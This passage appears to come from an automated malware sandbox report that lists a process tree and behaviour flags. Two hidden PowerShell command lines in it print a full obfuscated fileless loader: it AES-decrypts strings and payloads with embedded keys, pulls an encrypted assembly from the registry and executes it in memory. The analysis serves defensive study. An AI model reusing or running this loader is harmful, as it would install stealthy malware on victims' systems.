}}$pogEs=[string[]]$VXJBB.Split('\');$WRGtE=cuzkB (DlXiw ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pogEs[0])));$HmueV=cuzkB (DlXiw ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pogEs[1])));htDyt $HmueV (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));htDyt $WRGtE (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
C:\Windows\$sxr-powershell.exe (level 4)
Command line: "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function LmYrU($GlYrr){ $VzjlJ=[System.Security.Cryptography.Aes]::Create(); $VzjlJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VzjlJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VzjlJ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c='); $VzjlJ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A=='); $TOsgU=$VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')(); $PsSSM=$TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlYrr, 0, $GlYrr.Length); $TOsgU.Dispose(); $VzjlJ.Dispose(); $PsSSM;}function QfZmt($GlYrr){ $nVolF=New-Object System.IO.MemoryStream(,$GlYrr); $VTMYb=New-Object System.IO.MemoryStream; $nmqaP=New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::Decompress); $nmqaP.CopyTo($VTMYb); $nmqaP.Dispose(); $nVolF.Dispose(); $VTMYb.Dispose(); $VTMYb.ToArray();}function szqwG($GlYrr,$NEZvQ){ $ewoEL=[System.Reflection.Assembly]::Load([byte[]]$GlYrr); $HogUs=$ewoEL.EntryPoint; $HogUs.Invoke($null, $NEZvQ);}$VzjlJ1 = New-Object System.Security.Cryptography.AesManaged;$VzjlJ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$RyjbI = $VzjlJ1.('rotpyrceDetaerC'[-1..-15] -join '')();$WeCRB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rBC5HeHuGbR2ImUlWvTjSQ==');$WeCRB = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB, 0, $WeCRB.Length);$WeCRB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB);$bcFyd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BeaC7G+8Sm7rfYF70uj8+9TzFxmZEiUlsh2TM2xk1+A=');$bcFyd = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bcFyd, 0, $bcFyd.Length);$bcFyd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bcFyd);$yAHNg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ws3lAmjqLeV7orzZ/YWfPA==');$yAHNg = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yAHNg, 0, $yAHNg.Length);$yAHNg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yAHNg);$GzAMm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9YHl/b5X5ofe5n03Kerdh4fWRBxD0pX/SyLJUbzj2faRL6Qv9I9FCsrMwAk51NtgwviquEUBf774rXrYKUifdVSqSsjl2PnjYtC2Yif3g5oJQam2JhnRb/z9GIuB4etIiFGPLnhL7UgGxYr7DnbGDSi047eI/se79omdwxjPoPB7UTuOy824vLyL3bFw2frZJivPSph2HigUMsOKrI62VbZI6JY7T7bv8UjzSWfjrUhkZnJskkh5kcfdcX+A8XqeF/31RfDl5c5DHPnxu/BhJQmiutTpgmHEZ8pxw8KX7/WpeWJCCD9sD6u8SmgoJdMtkYDfo3NQnikVbk0RJeEDo5UR5p3qRCnPLBer93JUiV2p08BlQVV05Qsbgs+fHf8snJ0RpUq+FXqVWV/6CuV8UnlIPNfRNLCyAi25F5kCS8E=');$GzAMm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GzAMm, 0, $GzAMm.Length);$GzAMm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GzAMm);$AoGah = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VPLPBd2r41JicJsw8HEb8g==');$AoGah = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AoGah, 0, $AoGah.Length);$AoGah = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AoGah);$lgDvm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mr61btMD3+k5y48OeMz7Iw==');$lgDvm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lgDvm, 0, $lgDvm.Length);$lgDvm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lgDvm);$tqVXJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0cpebOCRE4vOUJtETKRgLw==');$tqVXJ = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tqVXJ, 0, $tqVXJ.Length);$tqVXJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tqVXJ);$LPaqK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4UbNTOvYCuJ3aS365B1ljg==');$LPaqK = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LPaqK, 0, $LPaqK.Length);$LPaqK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LPaqK);$EGznT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oQJLBF9lcvxb1b9b+hMFxQ==');$EGznT = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EGznT, 0, $EGznT.Length);$EGznT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EGznT);$WeCRB0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0bvuVlAbojoct73Wd6OFLQ==');$WeCRB0 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB0, 0, $WeCRB0.Length);$WeCRB0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB0);$WeCRB1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fnpxdZjqORDfNgWX1H/Pfw==');$WeCRB1 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB1, 0, $WeCRB1.Length);$WeCRB1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB1);$WeCRB2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HVF+C560xar/hFyTSm9+FQ==');$WeCRB2 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB2, 0, $WeCRB2.Length);$WeCRB2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB2);$WeCRB3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9OSzDNwsyhvLGrn+9PwCOw==');$WeCRB3 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB3, 0, $WeCRB3.Length);$WeCRB3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB3);$RyjbI.Dispose();$VzjlJ1.Dispose();if (@(get-process -ea silentlycontinue $WeCRB3).count -gt 1) {exit};$hbRRw = [Microsoft.Win32.Registry]::$LPaqK.$tqVXJ($WeCRB).$lgDvm($bcFyd);$XRetW=[string[]]$hbRRw.Split('\');$YrtyT=QfZmt(LmYrU([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($XRetW[1])));szqwG $YrtyT (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$hYivz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($XRetW[0]);$VzjlJ = New-Object System.Security.Cryptography.AesManaged;$VzjlJ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$TOsgU = $VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYivz = $TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYivz, 0, $hYivz.Length);$TOsgU.Dispose();$VzjlJ.Dispose();$nVolF = New-Object System.IO.MemoryStream(, $hYivz);$VTMYb = New-Object System.IO.MemoryStream;$nmqaP = New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::$WeCRB1);$nmqaP.$EGznT($VTMYb);$nmqaP.Dispose();$nVolF.Dispose();$VTMYb.Dispose();$hYivz = $VTMYb.ToArray();$iouAf = $GzAMm | IEX;$ewoEL = $iouAf::$WeCRB2($hYivz);$HogUs = $ewoEL.EntryPoint;$HogUs.$WeCRB0($null, (, [string[]] ($yAHNg)))
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
C:\Windows\$sxr-powershell.exe (level 5)
Command line: "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3416).WaitForExit();[System.Threading.Thread]::Sleep(5000); function LmYrU($GlYrr){ $VzjlJ=[System.Security.Cryptography.Aes]::Create(); $VzjlJ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VzjlJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VzjlJ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c='); $VzjlJ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A=='); $TOsgU=$VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')(); $PsSSM=$TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlYrr, 0, $GlYrr.Length); $TOsgU.Dispose(); $VzjlJ.Dispose(); $PsSSM;}function QfZmt($GlYrr){ $nVolF=New-Object System.IO.MemoryStream(,$GlYrr); $VTMYb=New-Object System.IO.MemoryStream; $nmqaP=New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::Decompress); $nmqaP.CopyTo($VTMYb); $nmqaP.Dispose(); $nVolF.Dispose(); $VTMYb.Dispose(); $VTMYb.ToArray();}function szqwG($GlYrr,$NEZvQ){ $ewoEL=[System.Reflection.Assembly]::Load([byte[]]$GlYrr); $HogUs=$ewoEL.EntryPoint; $HogUs.Invoke($null, $NEZvQ);}$VzjlJ1 = New-Object System.Security.Cryptography.AesManaged;$VzjlJ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$RyjbI = $VzjlJ1.('rotpyrceDetaerC'[-1..-15] -join '')();$WeCRB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rBC5HeHuGbR2ImUlWvTjSQ==');$WeCRB = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB, 0, $WeCRB.Length);$WeCRB = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB);$bcFyd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BeaC7G+8Sm7rfYF70uj8+9TzFxmZEiUlsh2TM2xk1+A=');$bcFyd = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bcFyd, 0, $bcFyd.Length);$bcFyd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bcFyd);$yAHNg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ws3lAmjqLeV7orzZ/YWfPA==');$yAHNg = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yAHNg, 0, $yAHNg.Length);$yAHNg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yAHNg);$GzAMm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9YHl/b5X5ofe5n03Kerdh4fWRBxD0pX/SyLJUbzj2faRL6Qv9I9FCsrMwAk51NtgwviquEUBf774rXrYKUifdVSqSsjl2PnjYtC2Yif3g5oJQam2JhnRb/z9GIuB4etIiFGPLnhL7UgGxYr7DnbGDSi047eI/se79omdwxjPoPB7UTuOy824vLyL3bFw2frZJivPSph2HigUMsOKrI62VbZI6JY7T7bv8UjzSWfjrUhkZnJskkh5kcfdcX+A8XqeF/31RfDl5c5DHPnxu/BhJQmiutTpgmHEZ8pxw8KX7/WpeWJCCD9sD6u8SmgoJdMtkYDfo3NQnikVbk0RJeEDo5UR5p3qRCnPLBer93JUiV2p08BlQVV05Qsbgs+fHf8snJ0RpUq+FXqVWV/6CuV8UnlIPNfRNLCyAi25F5kCS8E=');$GzAMm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GzAMm, 0, $GzAMm.Length);$GzAMm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GzAMm);$AoGah = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VPLPBd2r41JicJsw8HEb8g==');$AoGah = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AoGah, 0, $AoGah.Length);$AoGah = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AoGah);$lgDvm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mr61btMD3+k5y48OeMz7Iw==');$lgDvm = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lgDvm, 0, $lgDvm.Length);$lgDvm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lgDvm);$tqVXJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0cpebOCRE4vOUJtETKRgLw==');$tqVXJ = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tqVXJ, 0, $tqVXJ.Length);$tqVXJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tqVXJ);$LPaqK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4UbNTOvYCuJ3aS365B1ljg==');$LPaqK = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LPaqK, 0, $LPaqK.Length);$LPaqK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LPaqK);$EGznT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oQJLBF9lcvxb1b9b+hMFxQ==');$EGznT = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EGznT, 0, $EGznT.Length);$EGznT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EGznT);$WeCRB0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0bvuVlAbojoct73Wd6OFLQ==');$WeCRB0 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB0, 0, $WeCRB0.Length);$WeCRB0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB0);$WeCRB1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fnpxdZjqORDfNgWX1H/Pfw==');$WeCRB1 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB1, 0, $WeCRB1.Length);$WeCRB1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB1);$WeCRB2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HVF+C560xar/hFyTSm9+FQ==');$WeCRB2 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB2, 0, $WeCRB2.Length);$WeCRB2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB2);$WeCRB3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9OSzDNwsyhvLGrn+9PwCOw==');$WeCRB3 = $RyjbI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WeCRB3, 0, $WeCRB3.Length);$WeCRB3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WeCRB3);$RyjbI.Dispose();$VzjlJ1.Dispose();if (@(get-process -ea silentlycontinue $WeCRB3).count -gt 1) {exit};$hbRRw = [Microsoft.Win32.Registry]::$LPaqK.$tqVXJ($WeCRB).$lgDvm($bcFyd);$XRetW=[string[]]$hbRRw.Split('\');$YrtyT=QfZmt(LmYrU([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($XRetW[1])));szqwG $YrtyT (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$hYivz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($XRetW[0]);$VzjlJ = New-Object System.Security.Cryptography.AesManaged;$VzjlJ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VzjlJ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VzjlJ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9LYyQzQM9ObRTNtjjat6dGHCAmrnA9C39ag+PenTa5c=');$VzjlJ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QvFZR01UW2BYA8jIyDD/3A==');$TOsgU = $VzjlJ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYivz = $TOsgU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYivz, 0, $hYivz.Length);$TOsgU.Dispose();$VzjlJ.Dispose();$nVolF = New-Object System.IO.MemoryStream(, $hYivz);$VTMYb = New-Object System.IO.MemoryStream;$nmqaP = New-Object System.IO.Compression.GZipStream($nVolF, [IO.Compression.CompressionMode]::$WeCRB1);$nmqaP.$EGznT($VTMYb);$nmqaP.Dispose();$nVolF.Dispose();$VTMYb.Dispose();$hYivz = $VTMYb.ToArray();$iouAf = $GzAMm | IEX;$ewoEL = $iouAf::$WeCRB2($hYivz);$HogUs = $ewoEL.EntryPoint;$HogUs.$WeCRB0($null, (, [string[]] ($yAHNg)))
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\svchost.exe (level 1)
Command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe (level 1)
Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe (level 1)
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe (level 1)
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\SppExtComObj.exe (level 1)
Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe (level 1)
Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe (level 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe (level 1)
Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe (level 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe (level 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (level 1)
Command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe (level 1)
Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe (level 1)
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe (level 1)
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe (level 1)
Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe (level 1)
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe (level 1)
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe (level 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe (level 1)
Command line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\servicing\TrustedInstaller.exe (level 1)
Command line: C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe (level 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe (level 1)
Command line: C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\system32\svchost.exe (level 1)
Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads